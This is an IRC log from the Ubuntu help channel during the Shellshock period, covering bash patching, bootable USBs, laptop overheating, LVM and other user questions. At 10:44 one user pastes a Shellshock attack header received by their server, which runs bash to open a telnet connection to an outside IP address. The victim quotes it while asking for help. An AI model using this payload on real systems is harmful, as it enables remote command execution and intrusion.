[09:43] <Slart> polikit: I think the LTS releases should be safe to upgrade like that.. haven't tried it myself though
[09:44] <Thumpxr> debi: just do apt-get update && apt-get upgrade
[09:44] <Thumpxr> will patch the todays + yesterdays vulnerability
[09:44] <Hightower_> Debi: Yeah sorry
[09:45] <mohamadf> hi there. im in ubuntu and i wanna create a startup usb for manjaro-xfce iso image file. how can i do it?
[09:45] <debi> Thumpxr:I know that.I just wan to know if updating bash itself will solve the problem.
[09:45] <Thumpxr> debi: yes. Give me a minute, i give you a source
[09:46] <Slart> debi: what is the date on the newest bash package..    apt-cache policy bash   should tell you
[09:46] <debi> Slart:can't tell.I dno't have access to my ubuntu now.
[09:46] <Thumpxr> debi: http://www.ubuntu.com/usn/usn-2363-2/
[09:47] <k1l> debi: ubuntu has all patches shipped since yesterday. just run the updates
[09:48] <debi> k1l:So just updating bash can patch it right?
[09:48] <Thumpxr> debi: k1l yeah
[09:49] <k1l> debi: ubuntu ships security updates, including the shellshock patches
[09:49] <agent_white> Also, there's that one-liner out there you can run to make sure you're all patched up.
[09:49] <k1l> debi: just make sure you use a ubuntu release that is still supported.
[09:50] <debi> I just wanna patch shellshock!Does apt-get update&&apt-get install bash patch it or not?yes or no?
[09:51] <k1l> debi: there are a lot of other security issues with other programs. so i recommend to run all updates
[09:51] <debi> k1l:Oh man!I know that!but my question is s.th else!
[09:53] <debi> k1l:So yes or no?
[09:53] <k1l> debi: yes
[09:53] <debi> k1l:thanks:)
[09:53] <Zax1> hi there, does any know of a good link to get apple response to the shellshock issue ?
[09:53] <k1l> but again: that is careless insecure then.
[09:53] <Zax1> i tried / j apple but that site is by invite only :?
[09:53] <k1l> Zax1: well, ask the apple support :)
[09:54] <BluesKaj> Hiyas all
[09:54] <Zax1> thanks k1l that was very useful - i'll take that as a 'no' from you
[09:54] <debi> Why I get this?"Install these packages without verification? [y/N] y"
[09:55] <k1l> Zax1: please make sure to read the channel topic and the guidelines. thanks
[09:56] <k1l> debi: what ubuntu are you on exactly?
[09:56] <cfhowlett> debi, cat /etc/issue
[09:56] <debi> 14.04
[09:56] <Zax1> oh, please....
[09:57] <debi> cfhowlett:Don't have access to my ubuntu right now.but I changed some repos.
[09:57] <k1l> debi: that changed repos are the issue
[09:57] <cfhowlett> debi, one of your packages is from an untrusted source.  On your head, it is ..
[09:57] <k1l> debi: and if you dont have access, how come you know what the output is?
[09:57] <TJ-> Hmmmm, how'd you get the message if you don't have access to the system?
[09:58] <debi> k1l:yes.but why?it's becasue it's unofficial or s.th?
[09:58] <cfhowlett> debi, cuz it
[09:58] <cfhowlett> cuz it's not from a trusted repo.
[10:00] <debi> thanks.how a repo can be trusted?
[10:00] <k1l> so in most cases that is by some spinoff who mixes own repos and the ubuntu ones. and most block ubuntu updates because they will remove the spinoff packages
[10:00] <k1l> debi: so please come back if you have access to that ystem and can provide proper output.
[10:01] <debi> k1l:Ok thanks.
[10:05] <izarry> guys can i install crack version of photoshop in ubuntu 14.0?
[10:06] <mohamadf> how can i create a startup usb from manjaro linux iso file?
[10:06] <cfhowlett> mohamadf, unetbootin
[10:06] <cfhowlett> !piracy | izarry,
[10:07] <k1l> mohamadf: just "dd" the ubuntu iso onto the usb
[10:07] <agent_white> mohamadf: #manjaro
[10:08] <izarry> ohhhhhhhh so sorry , i have photoshop portable and thats not cracked , its just version cs4 , can i install it on ubuntu?
[10:09] <mohamadf> cfhowlett: i want that startup usb for an other pc that hasnt any os! for use unetbootin target system must be in ubuntu.
[10:09] <cfhowlett> izarry, you already stated it's cracked.  your honest is suspect and piracy in unsupported here.
[10:09] <cfhowlett> mohamadf, false.
[10:09] <cfhowlett> mohamadf, unetbootin is for making bootable usb's from ANY distro
[10:09] <unik> free chatting is alowwed in #ubuntu-offtopic
[10:10] <izarry> cfhowlett, oh okay thanks btw.
[10:10] <mohamadf> cfhowlett: im newbie... ok i try it. thanks :)
[10:10] <cfhowlett> mohamadf, happy2help
[10:12] <vitimiti> hi
[10:12] <proto> здравствуйте
[10:12] <mohamadf> cfhowlett: to use unetbootin, i've to partition my flash memory?
[10:13] <cfhowlett> !ru | proto
[10:13] <cfhowlett> mohamadf, no need to partition usb.
[10:13] <cfhowlett> mohamadf, install unetbootin to your main os (manaro?), then use unetbootin to make the usb
[10:14] <mohamadf> cfhowlett: my flash memory fs is ext4. its ok?
[10:14] <cfhowlett> mohamadf, NFTS is better
[10:14] <mohamadf> cfhowlett: i have ubuntu, and i wanna create a startup for Manjaro (based on Archlinux)
[10:15] <mohamadf> cfhowlett: ok, thanks again :D
[10:15] <vitimiti> Has it happened to anybody else that the perl module of hexchat is lost in Ubuntu Utopic?
[10:15] <cfhowlett> vitimiti, ask #ubuntu+1 for !utopic assistance
[10:15] <vitimiti> cfhowlett, thanks
[10:15] <cfhowlett> vitimiti, happy2help
[10:18] <Guest23101> hey.!not able to create hotspot using external wifi adapter.! any suggestion?
[10:19] <Guest23101> hey.!not able to create hotspot using external wifi adapter.! any suggestion?
[10:22] <Guest23101> helllooo
[10:22] <HitmanV> hello
[10:22] <HitmanV> what are you using to create the hotspot?
[10:22] <HitmanV> explain your situation
[10:23] <TJ-> Guest23101: Not all WiFi chipset firmwares support Infrastructure mode - some will only support STAtion mode and AdHoc
[10:23] <Guest23101> i'm using ap-hotspot
[10:24] <HitmanV> Thats a good point TJ, Guest23101: what adapter are you using?
[10:25] <Guest23101> I'm using leoxsys-nano150N
[10:26] <kekko> list
[10:26] <HitmanV> can you paste the output or error you get when running "sudo ap-hotspot start"
[10:27] <xgremlinx> Hi everyone, I'm using AMD/ATI open-source drivers on 14.10. In order to try and get better performance I'd like to try latest mesa drivers. Is it just a matter of adding xorg-edgers PPA, update & upgrade?
[10:27] <k1l_> xgremlinx: #ubuntu+1 for 14.10 spport please
[10:27] <Guest23101> using leoxsys (wifi adapteR), i'm able to detect wifi (created by others).. but, when i' tried to create hotspot using ap-hotspot.. its showind following message.. "Your wireless card or driver does not support Access Point mode"
[10:27] <xgremlinx> oh sry :) I'm on 14.04
 : "Your wireless card or driver does not support Access Point mode"
[10:27] <xgremlinx> typo (was looking at the next release :P)
[10:28] <HitmanV> Guest23101 well thats exactly it, you will need to research and purchase a wifi adapter that supports the mode
[10:29] <gr33n7007h> Guest23101, well, that error is pretty self explanatory
[10:30] <HitmanV> xgremlinx: i found that ubuntu is good with switching drivers, so unlike windows you dont need to uninstall anything, just go ahead
[10:30] <HitmanV> but also read the readme file that comes with most drivers, they often explain what prep you might need to do before installing
[10:30] <Guest23101> HitmanV : so, u mean.. Using this wifi adapter My laptop  can only able to detect wifi but cant create hotspot?
[10:31] <koell> Want to buy a new graphics card/pc for gaming. What's a good one with good performance and drivers? Can you recommend something?
[10:31] <cfhowlett> koell, intell or nvidia.  amd not so well supported.
[10:31] <HitmanV> Guest23101: correct, different wifi architecture is capable of different modes
[10:31] <xgremlinx> HitmanV: oh I'm not wanting to deal with proprietary, I'd just like more up-to-date free drivers, and it looks like xorg-edgers PPA offers that. they have a newer version of xorg-server-video-ati in there, so I suppose I can just add that PPA, update&upgrade and I shall be good
[10:31] <xgremlinx> I hope :)
[10:32] <koell> cfhowlett: an intel graphics card for gaming? do they have that much performance?
[10:32] <cfhowlett> koell, they are better supported ...
[10:32] <Guest23101> HitmanV : Ooo.!  :( Bad luck. Thank u so  much
[10:32] <koell> cfhowlett: can you recommend me one?
[10:33] <cfhowlett> koell, sadly, I can't.  still I only run steam on my 2009 laptop with intel mobile 4000 gpu.
[10:33] <xgremlinx> koell: maybe try this http://www.tomshardware.com/reviews/gaming-graphics-card-review,3107.html
[10:34] <xgremlinx> pick the best nvidia card there for the money you're thinking on spending
[10:34] <k1l_> !hcl | koell
[10:34] <xgremlinx> and do a quick check for linux support
[10:34] <koell> hmm, i dont know if there is any dedicated intel PCIe card, i only know intel from those HD4000 cards and so on :/
[10:34] <HitmanV> Guest23101: pleasure
[10:35] <xgremlinx> that Hardware Support page on nvidias cards ir pretty outdated (2010)
[10:44] <SthNotTaken> This is a header I was passed. My server's response was larger than it should be (156k vs. a normal 39k). What do I do now?
[10:44] <SthNotTaken> "() { :;}; /bin/bash -c \"telnet 197.242.148.29 9999\""
[10:45] <abhishek> how can i increase opt partition space
[10:47] <maxvi> how can I setup pigdin (google talk) with my email on google something like myemail@sub.mydomain.com ?
[10:47] <TJ-> SthNotTaken: Isolate it, then check logs carefully for indications of what the reverse telnet session was used for.
[10:47] <cfhowlett> SthNotTaken, ask #ubuntu-server channel?
[10:48] <SthNotTaken> cfhowlett: thanks
[10:48] <cfhowlett> SthNotTaken, happy2help
[10:58] <hduser92> hi
[11:00] <zy3pD> hi
[11:04] <MadsRC> 've finally taken on the challenge of setting up my own mailserver with Ubuntu :P I've set up pretty much everything except a Ubuntu mailserver :P
[11:07] <Svetlana> well yes, i didn't figure out why i'd like to run my own yet
[11:12] <koell> Why does the ubuntu installer not create an own /home partition when I choose to use encrypted (LVM) installation? I would like to have an encrypted installation WITH separate /home partition.
[11:13] <cfhowlett> koell, easy enough to configure that manually
[11:17] <koell> cfhowlett: easy?^^
[11:17] <cfhowlett> !home
[11:19] <koell> is it really that "clean" and easy to do this afterwards?
[11:19] <koell> im currently going to a new (old) pc with my first install there
[11:22] <doordie-> great choice koell
[11:22] <koell> hahahah :D
[11:23] <doordie-> ubuntu is like old windows but better
[11:23] <koell> im not a pro using arch linux :D
[11:23] <agent_white> arch isn't hard :)
[11:23] <agent_white> That's gentoo!
[11:23] <doordie-> try loading the latest version 14.04
[11:23] <doordie-> its clean
[11:25] <koell> im not using the default ubuntu, im more into lubuntu but i guess it doesnt matter to ask here
[11:25] <k1l_> lubuntu is fine for old hardware
[11:26] <PaulVern> I'm using Xubuntu
[11:26] <koell> yeah but i really need help to setup encrypted lvm with separate home part xD
[11:26] <PaulVern> I went KDE3.5 (Kubuntu) -> Gnome (Ubuntu 10.04, avoided KDE4) -> Xubuntu (Avoiding all the ads)
[11:27] <doordie-> i just downloaded ubuntu 14.04 and it loads clean
[11:27] <cfhowlett> lubuntu is optimized for older/lower specification hardware.   xubuntu is also good.
[11:27] <koell> i would even use it on newer hardware :3
[11:27] <agent_white> Night folks
[11:31] <Hjalamre> I have the weirdest issue with international characters. I cant enter swedish characters "åäö" into some applications. Applications that doesnt work: konsole, chrome, atom. Some that work: Kate, firefox, netbeans
[11:31] <koell> xD
[11:31] <Hjalamre> the characters render ok, and i can paste them into chrome for example
[11:31] <koell> you are welcome =)
[11:32] <Hjalamre> but when i press äöå in chrome/konsole nothing happens
[11:32] <TJ-> Hjalamre: Is the locale set to UTF-* ?
[11:32] <TJ-> Hjalamre: Is the locale set to UTF-8 ? :)
[11:32] <Hjalamre> it should be
[11:33] <Hjalamre> System Locale: LANG=en_US.UTF-8
[11:33] <Hjalamre> from localectl
[11:33] <Hjalamre> åäö also works in the standard linux terminal
[11:34] <Hjalamre> My guess would be that theres atleast 2 different ways to fetch keyboard input and one of them is a bit broken for me
[11:36] <Hjalamre> Also this used to work, but some update probably broke it about a week ago
[11:45] <rockworldmi> i am unable to boot into LiveDVD on hp450
[11:45] <rockworldmi> i have disabled uefi but still not working
[11:50] <MagicSpud> hello I use keepass and now  I cannot access my keyfile because the usb pendrive it is stored in stopped working. is there a way to fix this?
[11:52] <ubuntu> czesc
[11:52] <michele__> hi
[11:52] <cfhowlett> !czech
[11:53] <michele__> why if I close the laptop lid the laptop shutdown?
[11:54] <ubuntu_> _____________________________________________________________
[11:54] <ubuntu_> whois
[11:54] <cfhowlett> !whois
[11:54] <ubuntu_> who
[11:55] <HitmanV> michele__ have you looked in your power settings
[11:55] <michele__> yes
[11:55] <ubuntu_> no
[11:55] <TJ-> michele__: Usually closing the lid causes the PC to go into S3 sleep (Suspend) mode to save battery. Only the contents of memory are maintained. When the lid is opened, the PC resumes where it was
[11:56] <michele__> no showtdown and don't resumes
[11:56] <michele__> i've windows/ubuntu
[11:57] <HitmanV> sudo -H gedit /etc/systemd/logind.conf   Add a line HandleLidSwitch=ignore (make sure it's not commented out!),  reboot your pc
[11:57] <michele__> I think it's the fault of overheating
[11:57] <HitmanV> use sensord to check temp
[11:58] <michele__> #LidSwitchIgnoreInhibited=yes
[12:00] <HitmanV> im not sure if thats it
[12:01] <HitmanV> http://www.freedesktop.org/software/systemd/man/logind.conf.html
[12:01] <michele__> http://pasteall.org/pic/show.php?id=77750
[12:01] <michele__> save?
[12:02] <HitmanV> you need to uncomment the line for it to be active (remove #)
[12:02] <HitmanV> but i dont see HandleLidSwitch=ignore set correctly in that pic
[12:02] <Nomikos> while doing do-release-upgrade I'm getting a bunch of "/usr/sbin/grub-probe: warning: disk does not exist, so falling back to partition device /dev/xvda1" in the scrolling text, is that something that needs looking at?
[12:02] <Nomikos> this is a hosted VPS
[12:03] <michele__> suspend
[12:04] <ubuntu41w> Does anyone know if there is a bug in beta that prevents the use of encrypted installation? I can't unencrypt the disk on startup!
  suspend ?
[12:05] <michele__> i've looked this line #HandleLidSwitch=suspend
[12:05] <cfhowlett> ubunt41w   utopic is supported in #ubuntu+1
[12:05] <TJ-> Nomikos: It means the VM Guest doesn't control its own boot device; check with the hosting provider what their upgrade recommendations are
[12:05] <michele__> i write #HandleLidSwitch=ignore
[12:05] <michele__> ???
 ok now remove the hash (#) and change the "suspend to ignore" like this HandleLidSwitch=ignore
[12:05] <HitmanV> then save and reboot your pc
[12:05] <Nomikos> TJ-: thanks. can you point me to something with more info on this? or is that just man pages?
[12:05] <HitmanV> laptop
[12:06] <michele__> why the # i delete?
[12:06] <HitmanV> the # disables that entire line from being active
[12:06] <TJ-> Nomikos: Your hosting provider - they're the ones that know how their VM guests are configured.
[12:06] <Nomikos> TJ-: the upgrades do work, just seeing that message many many times during the process
[12:06] <Nomikos> TJ-: ok, thanks
[12:07] <EriC^^> Nomikos: that's the upgrader trying to run update-grub ( to update the bootloader )
[12:07] <michele__> look http://www.pasteall.org/54197
[12:07] <TJ-> Nomikos: Yeah, I'm not sure why grub would remain installed if it isn't needed. I'm assuming you started originally from a hosting-provider image and haven't manually added grub packages
[12:07] <michele__> it's ok?
[12:08] <michele__> save and reboot?
[12:08] <Nomikos> TJ-: I haven't added anything, no. we just chose the recent Ubuntu at the time
 yes
[12:08] <michele__> thanks now i try
[12:08] <HitmanV> :)
[12:09] <TJ-> Nomikos: xvda1 tells us the Hypervisor is Xen, so in your hosts control-panel there will likely be a choice of kernel version to boot with, and the XEN hypervisor will attach disk images as xvd? devices - so the system doesn't boot from a raw disk like a bare-metal system
[12:10] <Nomikos> TJ-: hmkay. I'll shoot them an email and CC the guy who set this up originally.
[12:10] <Nomikos> EriC^^: also thanks
[12:11] <mark|2> Anyone using dd-wrt?
[12:12] <k1l> mark|2: some do. but is that an ubuntu question?
[12:14] <mark|2> k1l: yeah cause I can't seem taccess it from my machine..
[12:14] <mark|2> running ubuntu
[12:14] <mark|2> but my other devices are fine..
[12:15] <cfhowlett> mark|2, was this and OEm
[12:15] <cfhowlett> or did you install dd-wrt
[12:15] <mark|2> cfhowlett: What OEm?
[12:15] <mark|2> cfhowlett: i've got DD-WRT already installed on it
[12:16] <cfhowlett> mark|2, if your other devices connect but this one doesn't, I suspect you've a bad ddwrt install
[12:16] <k1l> mark|2: any errormessages? does the wifi card work with other routers?
[12:17] <TJ-> mark|2: Can the PC connect using a wire, or is it only a WiFi issue? If the latter, check the syslog for indications of problems ...the common one is the regulatory domain in use restricting the client from using the channel the AP is on
[12:17] <mark|2> No error message at all, it's just an unending loading icon
[12:19] <mark|2> I'm using wired connection.. It's just that I'm not able to go to the admin panel.
[12:19] <TJ-> mark|2: E.g. AP on channel 13, but client restricted to channel 11 and below
[12:21] <mark|2> TJ-: It's on channel 6 by default, all devices should be able to connect
[12:22] <mark|2> Meh... I'll probably just reflash it again..
[12:22] <michele__> how to view temperature
[12:22] <mark|2> Sorry if it's not ubuntu related question..
[12:23] <michele__> how to view temperature
[12:23] <michele__> ?
[12:24] <EriC^^> michele__: psensor lets you view the temperatue
[12:24] <EriC^^> *temperature
[12:24] <budus> list
[12:25] <michele__> psensor?
[12:25] <michele__> in terminal?
[12:26] <michele__> ok i installing psensor
[12:26] <michele__> what is the just temperature?
[12:26] <budus> !list
[12:26] <[]Tsukasa[]> bind9 setup a hand full of zones, when I use dnsstuff tools it keeps reporting there is no MX records and no SOA but they are there in the forward zones. What would I check for this issue?
[12:26] <michele__> 97°
[12:26] <michele__> temp1 97°
[12:28] <michele__> join /#blender
[12:28] <EriC^^> michele__: 97 is way too high
[12:29] <michele__> my portable it's a bad computer!
[12:29] <michele__> :(
[12:29] <EriC^^> michele__: 50-60-70 i guess is ok depending on load
[12:29] <michele__> why it's too high?
[12:29] <EriC^^> michele__: maybe the fan needs cleaning and the air ducts
[12:29] <michele__> it is on desk
[12:29] <HitmanV> dust
[12:30] <TJ-> michele__: Mosts times the cause is fluff build up inside the laptop, blocking the ventilation radiator. Often you can clear that by turning the PC off, then using an air compressor to blow it out
[12:30] <HitmanV> not a vacuum cleaner
[12:30] <EriC^^> michele__: type top in the terminal, is there any process taking a big cpu % ?
[12:31] <michele__> now i've close all the program
[12:31] <michele__> 95°
[12:31] <TJ-> michele__: The 2nd cause is that the heatsink is performing poorly - in which case having it reseated and replacing the existing thermal compound with new, high quality, compound can often drop the idle temperature 10C from the nominal manufacturers specification
[12:31] <michele__> nono it's a portable
[12:32] <michele__> i've untuched
[12:32] <michele__> so since I bought it
[12:32] <michele__> 96°
[12:33] <michele__> cpu usage 17%
[12:33] <michele__> 96°
[12:33] <EriC^^> that's pretty high cpu usage
[12:33] <michele__> i must be open the pc
[12:33] <EriC^^> really high
[12:33] <EriC^^> i have 2-3%
[12:33] <michele__> cpu usage 17%?
[12:33] <michele__> it's high?
[12:33] <k1l> is the fan even spinning?
[12:34] <k1l> michele__: 90° is too high
[12:34] <EriC^^> michele__: yeah
[12:34] <michele__> yes even
[12:34] <EriC^^> michele__: type top in the terminal
[12:34] <EriC^^> and see what's using it
[12:34] <michele__> now i close firefox
[12:34] <michele__> 16%
[12:34] <michele__> cpu usage
[12:34] <k1l> michele__: what does "load" say in top?
[12:34] <michele__> mmm
[12:34] <michele__> what i screen
[12:35] <Grimlock1182> use entire disk and set up LVM, what is LVM?
[12:35] <michele__> http://pasteall.org/pic/show.php?id=77753
[12:35] <guzzi_jones> grimlock1182, lvm is logical volume management
[12:36] <guzzi_jones> you will be able to resize your drive without repartitioning
[12:36] <Grimlock1182> guzzi_jones, like gparted?
[12:36] <guzzi_jones> you also will be able to quickly "snapshot" the drive if you want.
[12:36] <guzzi_jones> you will not need gparted.
[12:37] <guzzi_jones> think of lvm as a layer on top of a partition
[12:37] <EriC^^> michele__: the kworker disappears after a while right?
[12:37] <guzzi_jones> so it goes, - physical disk --> parition --> lvm parition
[12:37] <Grimlock1182> guzzi_jones, ah.. ok thanks
[12:37] <michele__> what is the kworker?
[12:37] <EriC^^> michele__: it's the process in the top of the list
[12:38] <EriC^^> above compiz or xorg
[12:38] <michele__> yes
[12:38] <michele__> i think i will open that portable
[12:39] <michele__> for clean it
[12:39] <k1l> michele__: wait
[12:39] <k1l> kworker is the issue here
[12:39] <EriC^^> k1l: michele__ says that it disappears
[12:40] <michele__> i don't beliebe
[12:40] <EriC^^> michele__: is kworker still there?
[12:40] <michele__> it change the position
[12:40] <EriC^^> what's at the top of the list now? and what's the % ?
[12:40] <k1l> hmm, there is some known bugs with kworker to make a lot of cpu usage
[12:40] <michele__> nono it0s always on the top
[12:40] <michele__> sorry it's always on the top
[12:41] <k1l> and the load does link to that its on high demand
[12:41] <EriC^^> michele__: run top in the terminal, leave it for some secs running, then take a screen shot again, please
[12:41] <michele__> ok
[12:41] <guzzi_jones> grimlock1182, i have done on a server: physical disk-->paritition-->raid parition ->> lvm partition
[12:41] <b> hey guys how can i quickly set up a php server?
[12:42] <EriC^^> !lamp | b
[12:42] <michele__> http://pasteall.org/pic/show.php?id=77754
[12:43] <Grimlock1182> guzzi_jones, what is the different between to use the entire disk and use with LVM
[12:43] <zc_> nick Charles
[12:44] <EriC^^> michele__: it seems the problem is kworker
[12:44] <EriC^^> k1l: any suggestions?
[12:44] <k1l> michele__: EriC^^ seems like the cause are acpi interuppts are keeping kworker that high
[12:45] <k1l> http://sudoremember.blogspot.de/2013/05/high-cpu-usage-due-to-kworker.html michele__
[12:45] <k1l> that seems like a workaround so far
[12:46] <Goose84> I have set up a mount in /mnt/backups how would I make this accesable if i went to 192.168.2.6 eg i want the location path to be //192.168.2.6/backups
[12:47] <michele__> before i've setted this HandleLidSwitch=ignore
[12:47] <michele__> because i believe the problem of shutdown when i close the screen it's this
[12:47] <michele__> but it's the temperature!
[12:48] <archangelpetro> btw. to install gnome on ubuntu (unity) 14.04, is it just as simple as apt-get install gnome?
[12:48] <k1l> archangelpetro: gnome-shell
[12:49] <knightwise> I just did an install of Ubuntu with Mate
[12:49] <knightwise> also , not bad looking
[12:50] <archangelpetro> k1l, okay, cool :)
[12:57] <bruno_> 1
[12:57] <bruno_> 2
[13:01] <joshux> how to deal with procrastination
[13:01] <cfhowlett> joshux, wrong channel
[13:01] <k1l> joshux: join #ubuntu-offtopic , that will solve it :)
[13:02] <k1l> !away | dmsimard_away
[13:02] <zottel_> Anybody know how i can change the System Information? For example: MyName OS
[13:03] <k1l> zottel_: /etc/lsb-release?
[13:04] <Ekaterin> evince ignores the "auto-rotate and center" option when printing.  If you print an A5 pdf on A4 paper the printout will be in the top left corner of the pages, not in the centre as with Adobe Reader.
[13:05] <XfceGuy> hello there.  Could you please tell me if there is a proper channel for xfce users?
[13:05] <cfhowlett> XfceGuy, #xfce strangely enought
[13:05] <XfceGuy> I have some issues with Chromebook and Xfce
[13:05] <k1l> XfceGuy: you mean #xubuntu or #xfce ?
[13:05] <cfhowlett> *enough*
[13:06] <XfceGuy> k1l, aren't they the same thing?
[13:06] <cfhowlett> XfceGuy, nope.  xfce is the desktop environment.  used on several distros.
[13:07] <XfceGuy> cfhowlett,  O_o,  I am a very ignorant person, shame on me....
[13:07] <cfhowlett> XfceGuy, now you know.  spread the word!
[13:07] <XfceGuy> well I have got a wee mouse as a logo
[13:07] <XfceGuy> and in order to get in i have to type: sudo startxfce4
[13:08] <XfceGuy> so what is it then? Xfce?
[13:08] <bruno_> 1
[13:08] <d4rkt1m3s> does anyone know if there's a patch for Shellshock yet?
[13:08] <coelebs> hello how do i reset pulseaudio to factory default?
[13:08] <bruno_> 2
[13:08] <bruno_> 1/2
[13:08] <cfhowlett> d4rkt1m3s, yes it's been patched
[13:09] <XfceGuy> what is the command to get the ubuntu version?
[13:09] <d4rkt1m3s> good. I'll have it done by tonight
[13:09] <XfceGuy> I suspect I have Xfce with Precise Pangolin
[13:09] <XfceGuy> (i have a glass of white wine as well) :D
[13:10] <d4rkt1m3s> XfceGuy: lsb_release -a
[13:11] <XfceGuy> thanks d4rkt1m3s , I have Ubuntu 12.04.5 LTS, precise
[13:11] <d4rkt1m3s> XfceGuy: what's the problem?
[13:11] <XfceGuy> but I have Xfce as a desktop environment
[13:11] <d4rkt1m3s> so?
[13:11] <XfceGuy> d4rkt1m3s,  I hope you will have the patience..
[13:11] <bruno_> 1
[13:12] <bruno_> 2
[13:12] <bruno_> 1/2
[13:12] <JoeyJoeJo> Is there a complete fix yet for shellshock?
[13:12] <d4rkt1m3s> I am a technical support professional that works with seniors for a living. I have all the patience that you can get.
[13:12] <cfhowlett> JoeyJoeJo, yes.
[13:12] <XfceGuy> everything was working fine until I have installed something, I suspect, a program for referencing harvard style, called text-gyro
[13:13] <XfceGuy> or something like that...
[13:13] <d4rkt1m3s> and now?
[13:13] <XfceGuy> I have a Chromebook that runs crouton
[13:13] <XfceGuy> and it was very fast to load it
[13:13] <d4rkt1m3s> a Chromebook.... that means ARM processor right?
[13:14] <XfceGuy> d4rkt1m3s, yep
[13:14] <JoeyJoeJo> cfhowlett: Do I only have to update the bash package to get the fix?
[13:14] <cfhowlett> JoeyJoeJo, sudo apt-get install bash
[13:14] <d4rkt1m3s> XfceGuy: explain the symptoms of your issue please.
[13:15] <XfceGuy> I will in a moment, d4rkt1m3s , thanks for waiting
[13:16] <coelebs> here's my jackctl and pulseaudio logs if it's easier to fix than reset: http://pastebin.com/c7uYKXff and http://pastebin.com/JdwrJSZD
[13:17] <XfceGuy> so, basically now there are some weird thing happening: 1) it is 4 times slower and chromium browser seems having troubles... 2) I could not see the Desktop, but just a grey background.  So what I did was that I uninstalled text-gyro, and magically the desktop came back but, chromium browser is still behaving dodgy and it still takes longer to load when starting the code: sudo startxfce4
[13:18] <d4rkt1m3s> XfceGuy: you should update all of your packages (sudo apt-get update && apt-get upgrade), then tell me if you've still got the problem
[13:19] <d4rkt1m3s> if you still have the problem, apt-get purge text-gyro
[13:20] <XfceGuy> d4rkt1m3s, I did that previously as well, but I will do that again, and yes, I purged it from text-gyro...Anyway I will do these things again and I'll see you in a couple of minutes...
[13:20] <XfceGuy> thanks d4rkt1m3s
[13:20] <d4rkt1m3s> you're welcome.
[13:21] <d4rkt1m3s> hello
[13:23] <JoeyJoeJo> My /boot is full. How can I remove old versions of the kernel without installing new ones?
[13:25] <d4rkt1m3s_> can somebody kick d4rkt1m3s so I can log in?
[13:26] <xangua> !ghost
[13:26] <XfceGuy> Hi d4rkt1m3s?
[13:26] <XfceGuy> is he there?
[13:26] <d4rkt1m3s_> hi. my computer is being finicky today.
[13:26] <XfceGuy> ehehe
[13:26] <XfceGuy> that's all right,
[13:27] <XfceGuy> we are all in the same boat
[13:27] <XfceGuy> Could I show you something interesting in pastebin?
[13:27] <d4rkt1m3s> go ahead.
[13:27] <XfceGuy> it is the log of crouton
[13:27] <XfceGuy> when loading Ubuntu
[13:29] <XfceGuy> I have just noticed that the passwords saved in chromium have actually disappeared
[13:29] <XfceGuy> O_0
[13:29] <d4rkt1m3s> maybe you should reinstall chromium
[13:30] <Dudytz> hi all ... I have a host with a lxc container, like: host public ip 1.2.3.4, host private ip 192.168.0.1 ... container: private ip 192.168.0.2. The host act as a router with rules DNAT/MASQUERADE to route 1.2.3.4:25 to the container. This works wheel, but I cannot do a connection to 1.2.3.4:25 from the container. How can I configure the host iptables to correctly route this connection? My actual rules are: "-A PREROUTING -d 50.116.23.187 -p tcp --
[13:30] <Dudytz> dport 25 -j DNAT --to-destination 10.0.3.102" ... AND ... "-A POSTROUTING -s 192.168.0.0/24 ! -d 192.168.0.0/24 -j MASQUERADE"
[13:31] <t_dmitry> Hello guys. I have a loghitech mx mouse. How I can use all its additional buttons? For example, I want put win+s combination to my mice
[13:34] <PaulVern> Depends
[13:34] <PaulVern> I have an M560 and there is no solution for the middle button
[13:34] <PaulVern> it's actually sending keyboard commands
[13:34] <XfceGuy> http://pastebin.com/ZCjMcfH9
[13:34] <XfceGuy> d4rkt1m3s,  how do I re-install chromiu?
[13:35] <XfceGuy> d4rkt1m3s,  how do I re-install chromium?
[13:35] <d4rkt1m3s> XfceGuy: sudo apt-get remove chromium && apt-get install chromium.
[13:36] <Ekaterin> Can I have a little help with evince on Ubuntu 14.04?  It seems to ignore the "auto-rotate and center" option, so when I print a pdf file with small pages they appear in the corner rather than centered.
[13:37] <PaulVern> t_dmitry, give this guide a try: http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Guide-for-setup-Performance-MX-mouse-on-Linux-with-KDE/td-p/517167
[13:38] <PaulVern> substitute kate for gedit or vim
[13:38] <PaulVern> xbindkeys is what you want
[13:39] <t_dmitry> PaulVern, thanks a lot
[13:39] <XfceGuy> d4rkt1m3s, would removing chromium delete bookmarks?
[13:40] <t_dmitry> I'll try it
[13:40] <XfceGuy> d4rkt1m3s, would removing chromium delete bookmarks?
[13:40] <d4rkt1m3s> I have no Idea. probably.
[13:40] <PaulVern> XfceGuy, you probably have a .chromium folder in ~  I'd back that up first
[13:41] <PaulVern> alternatively, don't google have a syncing feature?
[13:41] <PaulVern> you could sign into that and sync your bookmarks to it
[13:42] <XfceGuy> ok, that's right
[13:42] <Carl_> I've encountered a problem. If anyone could help I'd really appreciate it. I'm running ubuntu 14.04. While trying to to perform any command (unzip, dpkg etc)  on any  file I get error: no such file or directory.
[13:43] <PaulVern> could you 'ls -lh <file>' ?
[13:43] <Ekaterin> Carl_, type "echo $PATH" - what do you get?
[13:44] <[]Tsukasa[]> bind9 issue. Checks not returning SOA, MX, SPF records http://stackoverflow.com/questions/26060636/dns-spf-mx-and-soa-issue
[13:46] <Carl_> @Ekaterin I get /user/local/bin:/usr/bin:/usr/local/games:/usr/games
[13:47] <Ekaterin> Carl_ it should be /usr/local/bin without the e, but that doesn't explain your problem.
[13:48] <Carl_> Yep that's right. It gave me usr but it got autocorrected
[13:49] <Ekaterin> Carl_ maybe you're in the wrong directory - type pwd to see where you are, cd to go to your home directory, ls for a list of files.
[13:50] <Ekaterin> And I think your PATH should have /bin in it as well as /usr/bin and /usr/local/bin.
[13:52] <Carl_> Ekaterin_ I'm in my home directory. It tells me I only have 1 file.
[13:53] <Carl_> I'm not sure if perhaps the path is wrong. The "games" portion is strange since I don't have anything stored in my games folder
[13:54] <Ekaterin> Could you have accidentally deleted all your files or moved them somewhere?  "ls -R" for a recursive listing in case your 1 file is actually a directory.
[13:56] <Carl_> Ls -R does display the file I'm trying to work with. Unfortunately when trying to execute a command with said file I get the error
[13:57] <aaa801> i seem to have a microsd card that will not format
[13:57] <aaa801> i can read from it just fine, just not delete/format
[13:57] <TJ-> Carl_: what does "hash" report - specifically, does it list any of the commands you're trying to execute?
[13:58] <pax2you> hi to all. How can i detect  a internal modem in a laptop?
[13:58] <geirha> Carl_: what does this output?   ''type dpkg''
[13:58] <TJ-> pax2you: "mmcli -L"
[13:58] <aaa801> pax2you: lspci ?
